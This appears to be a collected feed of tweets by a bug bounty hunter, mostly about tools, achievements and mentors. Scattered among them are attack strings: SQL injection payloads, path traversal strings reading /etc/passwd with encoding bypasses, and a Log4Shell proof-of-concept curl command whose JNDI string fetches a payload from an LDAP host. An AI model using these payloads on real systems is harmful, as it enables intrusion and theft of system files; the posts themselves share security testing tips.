Ever wished Shodan gave you data in 1 click instead of hours of copy-paste? 👀. I built Shodan Page Scraper 🕵️‍♂️ – a Chrome extension that rips:.✅ IPs.✅ Open Ports.✅ Subdomains.✅ DNS records.⚡ Idea came from @GodfatherOrwa during . #PHdays #BugBounty #Shodan #Infosec #RedTeam

🔍 Tip for finding SQLi in WordPress plugins:. - Study the code—check $wpdb queries & inputs. - Enumerate endpoints, forms, params w/ WPScan or manually. - Test for SQLi w/ payloads like ' OR 1=1 --. 💡 Might lead to a private CVE! Stay ethical.#BugBounty #SQLi

🔍 LFI Hunting Tips from Real Finds:.1️⃣ GET path injection: Try ///. /. /. /. /etc/passwd. Fuzz w/ Burp!.2️⃣ POST LFIs: Test endpoints like /router.jsp?. /etc/passwd. 3️⃣ Hidden params: Brute-force w/ ParamSpider or check JS files. 💡 Bypass filters w/ %2e%2f or %00 Stay ethical!

A new acknowledgement form @Apple for finding some vulnerabilities on one of main domains. #bug_hunting #bugbounty #xss #apple

In April, I submitted 19 vulnerabilities to 8 programs on @Hacker0x01. #TogetherWeHitHarder

Heeey there, I'm now part of Clear.

Short sad story 🙂.#bughunting #xss

A new write up for automating XSS. Note: I illustrate Xray installation here too. #BugBounty #bugbountytips #xss.

I have found about 50 XSS on a single program, .using my automation progress that's you will find it here and @SirBagoza Tips on his videos. #bugbountytips #xss #hackerone #h1

A year without hunting, time to streak again 🔥🔥.#bugbounty #h1 #hackerone

When I pentest on a project,.I found it use Wordpress CMS. So I think to get some juicy endpoints from /wp-json/. So I decide to create a python script to extract all endpoints and URLs from wp-json url. Github Link: #cyber_security #wordpress #Pentest

My journey started in 2019 with @NakerahNetwork , Then @3XS0 support me in a lot of cases and scenarios, Now I would like to thank you from all my heart to be here in this community because of you and for your continued support.

I would like to thank all of you @NakerahNetwork & @0xMuhammad for being the reason for starting my journey and being with me as a mentor , Now I discovered more than 300 vulnerabilities and Get in more 5 Engagements. Special Thanks to my Supporter all time @3XS0 .#bugbounty.

Yeah Yeah, it's me 😂🤣.#BugBounty

Hi guys , If anyone interested on Bug bounty automation see this article . #bugbountytips #SQLi #XSS #LFI #Recon.

Based on my last comment with @GodfatherOrwa and @eslam3kll , This is the template of SQLi Detection .Steps: .1- Catch all requests of parameters. 2- Grep reflected parameters with gf and Kxss.3- Fire this template.#happy_hacking #bugbounty

PoC:.curl -X POST -k --path-as-is http://192.168.0.140:8980/opennms/j_spring_security_check -d 'j_username=${jndi:ldap://192.168.0.140:1389/serial/CustomPayload}&j_password=abcd&j_usergroups=&Login='.#BugBounty #Log4j.

Some achievements from Microsoft:.MS-500.SC-300.SC-200.#security #CyberSecurity #BugBounty #Microsoft

My first RCE triggered on hackerone .#BugBounty #bugbountytips #cybersecurity